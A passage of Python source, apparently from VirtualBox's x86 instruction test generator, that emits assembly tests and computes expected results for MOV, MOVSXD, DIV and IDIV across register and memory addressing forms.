assert cbEffOp in [1, 2, 4, 8];
if cbEffOp == 1:
if iGReg >= 16:
return True;
if iGReg >= 4 and not self.is64Bit():
return True;
return False;
def gregNameBits(self, iReg, cBits):
""" Gets the name of the given register for the specified width (bits). """
return gregName(iReg, cBits, self.is64Bit());
def gregNameBytes(self, iReg, cbWidth):
""" Gets the name of the given register for the specified with (in bytes). """
return gregName(iReg, cbWidth * 8, self.is64Bit());
## Target environments.
g_dTargetEnvs = {
'iprt-r3-32': TargetEnv('iprt-r3-32', TargetEnv.ksInstrSet_32, TargetEnv.ksCpuMode_Protect, 3),
'iprt-r3-64': TargetEnv('iprt-r3-64', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 3),
'bs2-r0-64': TargetEnv('bs2-r0-64', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 0),
'bs2-r0-64-big': TargetEnv('bs2-r0-64-big', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 0),
'bs2-r0-32-big': TargetEnv('bs2-r0-32-big', TargetEnv.ksInstrSet_32, TargetEnv.ksCpuMode_Protect, 0),
};
class InstrTestBase(object):
"""
Base class for testing one instruction.
"""
def __init__(self, sName, sInstr = None):
self.sName = sName;
self.sInstr = sInstr if sInstr else sName.split()[0];
def isApplicable(self, oGen):
"""
Tests if the instruction test is applicable to the selected environment.
"""
_ = oGen;
return True;
def generateTest(self, oGen, sTestFnName):
"""
Emits the test assembly code.
"""
oGen.write(';; @todo not implemented. This is for the linter: %s, %s\n' % (oGen, sTestFnName));
return True;
def generateInputs(self, cbEffOp, cbMaxOp, oGen, fLong = False):
""" Generate a list of inputs. """
if fLong:
#
# Try do extremes as well as different ranges of random numbers.
#
auRet = [0, 1, ];
if cbMaxOp >= 1:
auRet += [ UINT8_MAX / 2, UINT8_MAX / 2 + 1, UINT8_MAX ];
if cbMaxOp >= 2:
auRet += [ UINT16_MAX / 2, UINT16_MAX / 2 + 1, UINT16_MAX ];
if cbMaxOp >= 4:
auRet += [ UINT32_MAX / 2, UINT32_MAX / 2 + 1, UINT32_MAX ];
if cbMaxOp >= 8:
auRet += [ UINT64_MAX / 2, UINT64_MAX / 2 + 1, UINT64_MAX ];
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
for cBits, cValues in ( (8, 4), (16, 4), (32, 8), (64, 8) ):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, cValues);
cWanted = 16;
elif oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
for cBits, cValues in ( (8, 8), (16, 8), (24, 2), (32, 16), (40, 1), (48, 1), (56, 1), (64, 16) ):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, cValues);
cWanted = 64;
else:
for cBits, cValues in ( (8, 16), (16, 16), (24, 4), (32, 64), (40, 4), (48, 4), (56, 4), (64, 64) ):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, cValues);
cWanted = 168;
if len(auRet) < cWanted:
auRet += randUxxList(cbEffOp * 8, cWanted - len(auRet));
else:
#
# Short list, just do some random numbers.
#
auRet = [];
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
auRet += randUxxList(cbMaxOp, 1);
elif oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
auRet += randUxxList(cbMaxOp, 2);
else:
auRet = [];
for cBits in (8, 16, 32, 64):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, 1);
return auRet;
class InstrTest_MemOrGreg_2_Greg(InstrTestBase):
"""
Instruction reading memory or general register and writing the result to a
general register.
"""
def __init__(self, sName, fnCalcResult, sInstr = None, acbOpVars = None):
InstrTestBase.__init__(self, sName, sInstr);
self.fnCalcResult = fnCalcResult;
self.acbOpVars = [ 1, 2, 4, 8 ] if not acbOpVars else list(acbOpVars);
self.fTestRegForm = True;
self.fTestMemForm = True;
## @name Test Instruction Writers
## @{
def writeInstrGregGreg(self, cbEffOp, iOp1, iOp2, oGen):
""" Writes the instruction with two general registers as operands. """
oGen.write(' %s %s, %s\n'
% ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp),));
return True;
def writeInstrGregPureRM(self, cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen):
""" Writes the instruction with two general registers as operands. """
oGen.write(' ');
if iOp2 == 13 and iMod == 0 and cAddrBits == 64:
oGen.write('altrexb '); # Alternative encoding for rip relative addressing.
oGen.write('%s %s, [' % (self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp),));
if (iOp2 == 5 or iOp2 == 13) and iMod == 0:
oGen.write('VBINSTST_NAME(g_u%sData)' % (cbEffOp * 8,))
if oGen.oTarget.is64Bit():
oGen.write(' wrt rip');
else:
if iMod == 1:
oGen.write('byte %d + ' % (offDisp,));
elif iMod == 2:
oGen.write('dword %d + ' % (offDisp,));
else:
assert iMod == 0;
if cAddrBits == 64:
oGen.write(g_asGRegs64[iOp2]);
elif cAddrBits == 32:
oGen.write(g_asGRegs32[iOp2]);
elif cAddrBits == 16:
assert False; ## @todo implement 16-bit addressing.
else:
assert False, str(cAddrBits);
oGen.write(']\n');
return True;
def writeInstrGregSibLabel(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes the instruction taking a register and a label (base only w/o reg), SIB form. """
assert offDisp is None; assert iBaseReg in [5, 13]; assert iIndexReg == 4; assert cAddrBits != 16;
if cAddrBits == 64:
# Note! Cannot test this in 64-bit mode in any sensible way because the disp is 32-bit
# and we cannot (yet) make assumtions about where we're loaded.
## @todo Enable testing this in environments where we can make assumptions (boot sector).
oGen.write(' %s %s, [VBINSTST_NAME(g_u%sData) xWrtRIP]\n'
% ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), cbEffOp * 8,));
else:
oGen.write(' altsibx%u %s %s, [VBINSTST_NAME(g_u%sData) xWrtRIP] ; iOp1=%s cbEffOp=%s\n'
% ( iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), cbEffOp * 8, iOp1, cbEffOp));
return True;
def writeInstrGregSibScaledReg(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes the instruction taking a register and disp+scaled register (no base reg), SIB form. """
assert iBaseReg in [5, 13]; assert iIndexReg != 4; assert cAddrBits != 16;
# Note! Using altsibxN to force scaled encoding. This is only really a
# necessity for iScale=1, but doesn't hurt for the rest.
oGen.write(' altsibx%u %s %s, [%s * %#x'
% (iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBits(iIndexReg, cAddrBits), iScale,));
if offDisp is not None:
oGen.write(' + %#x' % (offDisp,));
oGen.write(']\n');
_ = iBaseReg;
return True;
def writeInstrGregSibBase(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes the instruction taking a register and base only (with reg), SIB form. """
oGen.write(' altsibx%u %s %s, [%s'
% (iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBits(iBaseReg, cAddrBits),));
if offDisp is not None:
oGen.write(' + %#x' % (offDisp,));
oGen.write(']\n');
_ = iIndexReg;
return True;
def writeInstrGregSibBaseAndScaledReg(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes tinstruction taking a register and full featured SIB form address. """
# Note! From the looks of things, yasm will encode the following instructions the same way:
# mov eax, [rsi*1 + rbx]
# mov eax, [rbx + rsi*1]
# So, when there are two registers involved, the '*1' selects
# which is index and which is base.
oGen.write(' %s %s, [%s + %s * %u'
% ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp),
oGen.gregNameBits(iBaseReg, cAddrBits), oGen.gregNameBits(iIndexReg, cAddrBits), iScale,));
if offDisp is not None:
oGen.write(' + %#x' % (offDisp,));
oGen.write(']\n');
return True;
## @}
## @name Memory setups
## @{
def generateMemSetupReadByLabel(self, oGen, cbEffOp, uInput):
""" Sets up memory for a memory read. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(Common_SetupMemReadU%u)\n' % (cbEffOp*8,));
return True;
def generateMemSetupReadByReg(self, oGen, cAddrBits, cbEffOp, iReg1, uInput, offDisp = None):
""" Sets up memory for a memory read indirectly addressed thru one register and optional displacement. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iBaseReg = iReg1, offDisp = offDisp),));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iReg1],));
return True;
def generateMemSetupReadByScaledReg(self, oGen, cAddrBits, cbEffOp, iIndexReg, iScale, uInput, offDisp = None):
""" Sets up memory for a memory read indirectly addressed thru one register and optional displacement. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, offDisp = offDisp, iIndexReg = iIndexReg, iScale = iScale),));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iIndexReg],));
return True;
def generateMemSetupReadByBaseAndScaledReg(self, oGen, cAddrBits, cbEffOp, iBaseReg, iIndexReg, iScale, uInput, offDisp):
""" Sets up memory for a memory read indirectly addressed thru two registers with optional displacement. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iBaseReg = iBaseReg, offDisp = offDisp,
iIndexReg = iIndexReg, iScale = iScale),));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iIndexReg],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iBaseReg],));
return True;
def generateMemSetupPureRM(self, oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp = None):
""" Sets up memory for a pure R/M addressed read, iOp2 being the R/M value. """
oGen.pushConst(uInput);
assert offDisp is None or iMod != 0;
if (iOp2 != 5 and iOp2 != 13) or iMod != 0:
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iOp2, offDisp),));
else:
oGen.write(' call VBINSTST_NAME(Common_SetupMemReadU%u)\n' % (cbEffOp*8,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
return True;
## @}
def generateOneStdTestGregGreg(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult):
""" Generate one standard instr greg,greg test. """
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uInput,));
if iOp1X != iOp2X:
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
self.writeInstrGregGreg(cbEffOp, iOp1, iOp2, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1X, iOp2X if iOp1X != iOp2X else None),));
_ = cbMaxOp;
return True;
def generateOneStdTestGregGreg8BitHighPain(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput):
""" High 8-bit registers are a real pain! """
assert oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) or oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2);
# Figure out the register indexes of the max op sized regs involved.
iOp1X = iOp1 & 3;
iOp2X = iOp2 & 3;
oGen.write(' ; iOp1=%u iOp1X=%u iOp2=%u iOp2X=%u\n' % (iOp1, iOp1X, iOp2, iOp2X,));
# Calculate unshifted result.
if iOp1X != iOp2X:
uCur = oGen.auRegValues[iOp1X];
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8);
else:
uCur = uInput;
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) != oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8);
else:
uCur = rotateLeftUxx(cbMaxOp * 8, uCur, 8);
uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen);
# Rotate the input and/or result to match their max-op-sized registers.
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
uInput = rotateLeftUxx(cbMaxOp * 8, uInput, 8);
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
uResult = rotateLeftUxx(cbMaxOp * 8, uResult, 8);
# Hand it over to an overridable worker method.
return self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult);
def generateOneStdTestGregMemNoSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iOp2, uInput, uResult):
""" Generate mode 0, 1 and 2 test for the R/M=iOp2. """
if cAddrBits == 16:
_ = cbMaxOp;
else:
iMod = 0; # No disp, except for i=5.
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput);
self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, None, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
if iOp2 != 5 and iOp2 != 13:
iMod = 1;
for offDisp in oGen.getDispForMod(iMod):
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp);
self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
iMod = 2;
for offDisp in oGen.getDispForMod(iMod):
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp);
self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
return True;
def generateOneStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod, # pylint: disable=R0913
iBaseReg, iIndexReg, iScale, uInput, uResult):
""" Generate one SIB variations. """
for offDisp in oGen.getDispForMod(iMod, cbEffOp):
if ((iBaseReg == 5 or iBaseReg == 13) and iMod == 0):
if iIndexReg == 4:
if cAddrBits == 64:
continue; # skipping.
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupReadByLabel(oGen, cbEffOp, uInput);
self.writeInstrGregSibLabel(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1);
else:
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupReadByScaledReg(oGen, cAddrBits, cbEffOp, iIndexReg, iScale, uInput, offDisp);
self.writeInstrGregSibScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1, iIndexReg);
else:
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
if iIndexReg == 4:
self.generateMemSetupReadByReg(oGen, cAddrBits, cbEffOp, iBaseReg, uInput, offDisp);
self.writeInstrGregSibBase(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1, iBaseReg);
else:
if iIndexReg == iBaseReg and iScale == 1 and offDisp is not None and (offDisp & 1):
if offDisp < 0: offDisp += 1;
else: offDisp -= 1;
self.generateMemSetupReadByBaseAndScaledReg(oGen, cAddrBits, cbEffOp, iBaseReg,
iIndexReg, iScale, uInput, offDisp);
self.writeInstrGregSibBaseAndScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1, iBaseReg, iIndexReg);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (sChecker,));
_ = cbMaxOp;
return True;
def generateStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, auInputs):
""" Generate all SIB variations for the given iOp1 (reg) value. """
assert cAddrBits in [32, 64];
i = oGen.cSibBasePerRun;
while i > 0:
oGen.iSibBaseReg = (oGen.iSibBaseReg + 1) % oGen.oTarget.getGRegCount(cAddrBits / 8);
if oGen.iSibBaseReg == X86_GREG_xSP: # no RSP testing atm.
continue;
j = oGen.getSibIndexPerRun();
while j > 0:
oGen.iSibIndexReg = (oGen.iSibIndexReg + 1) % oGen.oTarget.getGRegCount(cAddrBits / 8);
if oGen.iSibIndexReg == iOp1 and oGen.iSibIndexReg != 4 and cAddrBits != cbMaxOp:
continue; # Don't know the high bit of the address ending up the result - skip it for now.
for iMod in [0, 1, 2]:
if oGen.iSibBaseReg == iOp1 \
and ((oGen.iSibBaseReg != 5 and oGen.iSibBaseReg != 13) or iMod != 0) \
and cAddrBits != cbMaxOp:
continue; # Don't know the high bit of the address ending up the result - skip it for now.
for _ in oGen.oSibScaleRange:
oGen.iSibScale *= 2;
if oGen.iSibScale > 8:
oGen.iSibScale = 1;
for uInput in auInputs:
oGen.newSubTest();
uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[iOp1], oGen);
self.generateOneStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod,
oGen.iSibBaseReg, oGen.iSibIndexReg, oGen.iSibScale,
uInput, uResult);
j -= 1;
i -= 1;
return True;
def generateStandardTests(self, oGen):
""" Generate standard tests. """
# Parameters.
cbDefOp = oGen.oTarget.getDefOpBytes();
cbMaxOp = oGen.oTarget.getMaxOpBytes();
auShortInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen);
auLongInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen, fLong = True);
iLongOp1 = oGen.oTarget.randGRegNoSp();
iLongOp2 = oGen.oTarget.randGRegNoSp();
# Register tests
if self.fTestRegForm:
for cbEffOp in self.acbOpVars:
if cbEffOp > cbMaxOp:
continue;
oOp2Range = range(oGen.oTarget.getGRegCount(cbEffOp));
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
oOp2Range = [iLongOp2,];
oGen.write('; cbEffOp=%u\n' % (cbEffOp,));
for iOp1 in range(oGen.oTarget.getGRegCount(cbEffOp)):
if iOp1 == X86_GREG_xSP:
continue; # Cannot test xSP atm.
for iOp2 in oOp2Range:
if (iOp2 >= 16 and iOp1 in range(4, 16)) \
or (iOp1 >= 16 and iOp2 in range(4, 16)):
continue; # Any REX encoding turns AH,CH,DH,BH regs into SPL,BPL,SIL,DIL.
if iOp2 == X86_GREG_xSP:
continue; # Cannot test xSP atm.
oGen.write('; iOp2=%u cbEffOp=%u\n' % (iOp2, cbEffOp));
for uInput in (auLongInputs if iOp1 == iLongOp1 and iOp2 == iLongOp2 else auShortInputs):
oGen.newSubTest();
if not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) and not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
uCur = oGen.auRegValues[iOp1 & 15] if iOp1 != iOp2 else uInput;
uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen);
self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1 & 15, iOp2, iOp2 & 15,
uInput, uResult);
else:
self.generateOneStdTestGregGreg8BitHighPain(oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput);
# Memory test.
if self.fTestMemForm:
for cAddrBits in oGen.oTarget.getAddrModes():
for cbEffOp in self.acbOpVars:
if cbEffOp > cbMaxOp:
continue;
for _ in oGen.getModRegRange(cbEffOp):
oGen.iModReg = (oGen.iModReg + 1) % oGen.oTarget.getGRegCount(cbEffOp);
if oGen.iModReg == X86_GREG_xSP:
continue; # Cannot test xSP atm.
if oGen.iModReg > 15:
continue; ## TODO AH,CH,DH,BH
auInputs = auLongInputs if oGen.iModReg == iLongOp1 else auShortInputs;
for _ in oGen.oModRmRange:
oGen.iModRm = (oGen.iModRm + 1) % oGen.oTarget.getGRegCount(cAddrBits * 8);
if oGen.iModRm != 4 or cAddrBits == 16:
for uInput in auInputs:
oGen.newSubTest();
if oGen.iModReg == oGen.iModRm and oGen.iModRm != 5 \
and oGen.iModRm != 13 and cbEffOp != cbMaxOp:
continue; # Don't know the high bit of the address ending up the result - skip it for now.
uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[oGen.iModReg & 15], oGen);
self.generateOneStdTestGregMemNoSib(oGen, cAddrBits, cbEffOp, cbMaxOp,
oGen.iModReg, oGen.iModRm, uInput, uResult);
else:
# SIB - currently only short list of inputs or things may get seriously out of hand.
self.generateStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, auShortInputs);
return True;
def generateTest(self, oGen, sTestFnName):
oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
self.generateStandardTests(oGen);
oGen.write(' ret\n');
oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
return True;
class InstrTest_Mov_Gv_Ev(InstrTest_MemOrGreg_2_Greg):
"""
Tests MOV Gv,Ev.
"""
def __init__(self):
InstrTest_MemOrGreg_2_Greg.__init__(self, 'mov Gv,Ev', self.calc_mov);
@staticmethod
def calc_mov(cbEffOp, uInput, uCur, oGen):
""" Calculates the result of a mov instruction."""
if cbEffOp == 8:
return uInput & UINT64_MAX;
if cbEffOp == 4:
return uInput & UINT32_MAX;
if cbEffOp == 2:
return (uCur & 0xffffffffffff0000) | (uInput & UINT16_MAX);
assert cbEffOp == 1; _ = oGen;
return (uCur & 0xffffffffffffff00) | (uInput & UINT8_MAX);
class InstrTest_MovSxD_Gv_Ev(InstrTest_MemOrGreg_2_Greg):
"""
Tests MOVSXD Gv,Ev.
"""
def __init__(self):
InstrTest_MemOrGreg_2_Greg.__init__(self, 'movsxd Gv,Ev', self.calc_movsxd, acbOpVars = [ 8, 4, 2, ]);
self.fTestMemForm = False; # drop this...
def writeInstrGregGreg(self, cbEffOp, iOp1, iOp2, oGen):
""" Writes the instruction with two general registers as operands. """
if cbEffOp == 8:
oGen.write(' movsxd %s, %s\n'
% ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp / 2),));
else:
oGen.write(' oddmovsxd %s, %s\n'
% ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp),));
return True;
def isApplicable(self, oGen):
return oGen.oTarget.is64Bit();
@staticmethod
def calc_movsxd(cbEffOp, uInput, uCur, oGen):
"""
Calculates the result of a movxsd instruction.
Returns the result value (cbMaxOp sized).
"""
_ = oGen;
if cbEffOp == 8 and (uInput & RT_BIT_32(31)):
return (UINT32_MAX << 32) | (uInput & UINT32_MAX);
if cbEffOp == 2:
return (uCur & 0xffffffffffff0000) | (uInput & 0xffff);
return uInput & UINT32_MAX;
class InstrTest_DivIDiv(InstrTestBase):
"""
Tests IDIV and DIV instructions.
"""
def __init__(self, fIsIDiv):
if not fIsIDiv:
InstrTestBase.__init__(self, 'div Gv,Ev', 'div');
else:
InstrTestBase.__init__(self, 'idiv Gv,Ev', 'idiv');
self.fIsIDiv = fIsIDiv;
def generateInputEdgeCases(self, cbEffOp, fLong, fXcpt):
""" Generate edge case inputs for cbEffOp. Returns a list of pairs, dividen + divisor. """
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = [];
uDivisor = 1 if fLong else 3;
uDividend = uStep * uDivisor - 1;
for i in range(5 if fLong else 3):
auRet.append([uDividend + fXcpt, uDivisor]);
if self.fIsIDiv:
auRet.append([-uDividend - fXcpt, -uDivisor]);
auRet.append([-(uDividend + uDivisor + fXcpt), uDivisor]);
auRet.append([ (uDividend + uDivisor + fXcpt), -uDivisor]);
if i <= 3 and fLong:
auRet.append([uDividend - 1 + fXcpt*3, uDivisor]);
if self.fIsIDiv:
auRet.append([-(uDividend - 1 + fXcpt*3), -uDivisor]);
uDivisor += 1;
uDividend += uStep;
uDivisor = uStep - 1;
uDividend = uStep * uDivisor - 1;
for _ in range(3 if fLong else 1):
auRet.append([uDividend + fXcpt, uDivisor]);
if self.fIsIDiv:
auRet.append([-uDividend - fXcpt, -uDivisor]);
uDivisor -= 1;
uDividend -= uStep;
if self.fIsIDiv:
uDivisor = -uStep;
for _ in range(3 if fLong else 1):
auRet.append([uDivisor * (-uStep - 1) - (not fXcpt), uDivisor]);
uDivisor += 1
uDivisor = uStep - 1;
for _ in range(3 if fLong else 1):
auRet.append([-(uDivisor * (uStep + 1) - (not fXcpt)), uDivisor]);
uDivisor -= 1
return auRet;
def generateInputsNoXcpt(self, cbEffOp, fLong = False):
""" Generate inputs for cbEffOp. Returns a list of pairs, dividen + divisor. """
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = self.generateInputEdgeCases(cbEffOp, fLong, False)
# random tests.
if self.fIsIDiv:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randSxx(cbEffOp * 8);
if uDivisor == 0 or uDivisor >= uStep or uDivisor < -uStep:
continue;
uDividend = randSxx(cbEffOp * 16);
uResult = uDividend / uDivisor;
if uResult >= uStep or uResult <= -uStep: # exclude difficulties
continue;
break;
auRet.append([uDividend, uDivisor]);
else:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randUxx(cbEffOp * 8);
if uDivisor == 0 or uDivisor >= uStep:
continue;
uDividend = randUxx(cbEffOp * 16);
uResult = uDividend / uDivisor;
if uResult >= uStep:
continue;
break;
auRet.append([uDividend, uDivisor]);
return auRet;
def generateOneStdTestGreg(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV rDX:rAX,<GREG>' test. """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fEffOp = ((1 << (cbEffOp *8) ) - 1);
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
fTopOp = fMaxOp - fEffOp;
fFullOp1 = ((1 << (cbEffOp*16)) - 1);
uAX = iDividend & fFullOp1; # full with unsigned
uDX = uAX >> (cbEffOp*8);
uAX &= fEffOp;
uOp2Val = iDivisor & fEffOp;
iQuotient = iDividend / iDivisor;
iReminder = iDividend % iDivisor;
if iReminder != 0 and iQuotient < 0: # python has different rounding rules for negative division.
iQuotient += 1;
iReminder -= iDivisor;
uAXResult = iQuotient & fEffOp;
uDXResult = iReminder & fEffOp;
if cbEffOp < cbMaxOp:
uAX |= randUxx(cbMaxOp * 8) & fTopOp;
uDX |= randUxx(cbMaxOp * 8) & fTopOp;
uOp2Val |= randUxx(cbMaxOp * 8) & fTopOp;
if cbEffOp < 4:
uAXResult |= uAX & fTopOp;
uDXResult |= uDX & fTopOp;
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
' ; iQuotient=%#x (%d) iReminder=%#x (%d)\n'
% ( iDividend & fFullOp1, iDividend, iDivisor & fEffOp, iDivisor,
iQuotient & fEffOp, iQuotient, iReminder & fEffOp, iReminder, ));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX], uDX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
oGen.pushConst(uDXResult);
oGen.pushConst(uAXResult);
oGen.write(' %-4s %s\n' % (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, X86_GREG_xDX, iOp2),));
return True;
def generateOneStdTestGreg8Bit(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV AX,<GREG>' test (8-bit). """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
iOp2X = (iOp2 & 3) if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2) else iOp2;
assert iOp2X != X86_GREG_xAX;
uAX = iDividend & UINT16_MAX; # full with unsigned
uOp2Val = iDivisor & UINT8_MAX;
iQuotient = iDividend / iDivisor;
iReminder = iDividend % iDivisor;
if iReminder != 0 and iQuotient < 0: # python has different rounding rules for negative division.
iQuotient += 1;
iReminder -= iDivisor;
uAXResult = (iQuotient & UINT8_MAX) | ((iReminder & UINT8_MAX) << 8);
uAX |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT16_MAX);
uAXResult |= uAX & (fMaxOp - UINT16_MAX);
uOp2Val |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT8_MAX);
if iOp2X != iOp2:
uOp2Val = rotateLeftUxx(cbMaxOp * 8, uOp2Val, 8);
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
' ; iQuotient=%#x (%d) iReminder=%#x (%d)\n'
